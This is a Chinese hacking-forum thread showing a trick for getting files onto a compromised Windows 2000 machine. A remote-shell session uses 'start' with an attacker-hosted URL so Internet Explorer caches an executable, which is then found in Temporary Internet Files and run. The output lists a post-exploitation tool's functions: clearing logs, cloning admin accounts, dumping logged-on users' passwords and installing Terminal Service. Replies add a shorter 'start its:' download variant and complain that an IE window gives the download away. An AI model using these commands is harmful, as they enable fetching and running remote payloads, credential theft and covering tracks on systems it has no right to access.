变态传文件法(比tftp,ftp,iget.vbe都爽的 申请落伍
系统用户没有登陆的情况下测试,当然,登陆了更好,呵呵-----------------可爱的分割线---------------------------
"Wollf Remote Manager" v1.6
Code by wollf, [url]http://www.xfocus.org[/url]
[wsdd-wb7egq0ebt at C:\WINNT\system32]#dos
Microsoft Windows 2000 [Version 5 dot 00.2195]
(C) 版权所有 1985-1998
Microsoft Corp.
C:\WINNT\system32>dir c:\tt*.exe /s
dir c:\tt*.exe /s
驱动器 C
中的卷没有标签。
卷的序列号是 045A-2E61
找不到文件
C:\WINNT\system32>start [url]http://aaa.sssss.com/a.htm[/url]
start [url]http://aaa.sssss.com/a.htm[/url]
C:\WINNT\system32>dir c:\tt*.exe /s
dir c:\tt*.exe /s
驱动器 C
中的卷没有标签。
卷的序列号是 045A-2E61
c:\Documents and Settings\Default User\Local Settings\Temporary
Internet Files\
Content.IE5\0VELAZCD 的目录
2005-10-09
18:15
39,139
tt[1].exe
1 个文件 39,139 字节
列出所有文件:
1 个文件 39,139
字节
0 个目录3,273,519,104 可用字节
C:\WINNT\system32>"c:\Documents and Settings\Default User\Local
Settings\Temporary
Internet Files\Content.IE5\0VELAZCD\tt[1].exe"
"c:\Documents and Settings\Default User\Local Settings\Temporary Internet
Files\
Content.IE5\0VELAZCD\tt[1].exe"
MZ at
Opintion
:
-filter
---Change TCP/IP filter to on/off status dot
-addport
---Add ports to the filter' allowed portlist.
-setport
---Set ports as the filter' allowed portlist.
-nicinfo
---List TCP/IP interface info.
-pslist
---List active processes.
-pskill
---Kill a specified process.
-dlllist
---List dlls of a specified process.
-sysinfo
---List system info.
-shutdown
---Shutdown system.
-reboot
---Reboot system.
-poweroff
---Turn off power.
-logoff
---Logoff current user's
session.
Used in an interactive logon session only.
-chkts
---Check Terminal Service info.
-setupts
---Install Terminal Service.
-remts
---Remove Terminal Service.
-chgtsp
---Reset Terminal Service port.
-clog
---Clean system log.
-enumsrv
---List all services.
-querysrv
---List detail info of a specified service.
-instsrv
---Install a service.
-cfgsrv
---Changes the configuration of a service.
-remsrv
---Remove a specified service.
-startsrv
---Start a specified service.
-stopsrv
---Stop a specified service.
-netget
---Download from http/ftp.
-redirect
---Port redirect.
-chkuser
---List all account、sid and anti clone.
-clone
---Clone from admin to dest.
-never
---Set account looks like never logged on.
-killuser
---Del account. Even "guest" account.
-su
---Run process as Local_System
privilege.
Usage: mt.exe -su [File]----Default run cmd.e
xe
-findpass
---Show all logged on user's pass.
-netstat
---List TCP connections.
-killtcp
---Kill TCP connection.
-psport
---Map ports to processes.
-touch
---Set the file times for a specified file.
-secdel
---Secure delete files and directory or zap free
s
pace.
-regshell
---Enter a console registry editor.
-chkdll
---Detect gina dll backdoor.
C:\WINNT\system32>
-----------------可爱的分割线---------------------------
呵呵,目的达到.
让大家看看htm的代码
-----------------可爱的分割线---------------------------
-----------------可爱的分割线---------------------------
就是这些了,如果你没看懂有什么用,那只好说sorry了.呵呵
缺点?当然也是有的拉,呵呵
------------------------------------------------------------------
汗,原来早就有人提过,还有不需要构造htm的方法,
羞死
START ITS:[url]HTTP://sdf.sdfd.net/tt.exe[/url] 有点乱……我自己都蒙了……哪位高手解释下咯…… 你能看明白么?我看得有点懂了……好像就是start这个吧 稀里糊涂.....还是不明白...到底怎么样传??...
不过懂的它的变态在何处:没人看得懂......
而且这东东在不少论坛有传......... start its:..............
我试了一次,但是有个IE窗口弹出来啊,这样不就暴露了吗 的确会有个下载窗口出来……哪位高手会的…解释下咯…… ::07:: ::07:: 真的很变态,不是疯狂,痴人说梦.
Deroemon
什么东西啊??都看不懂是什么:face3 :face3 :face3 貌似是把那个文件下载到网页缓存中
页:
[1]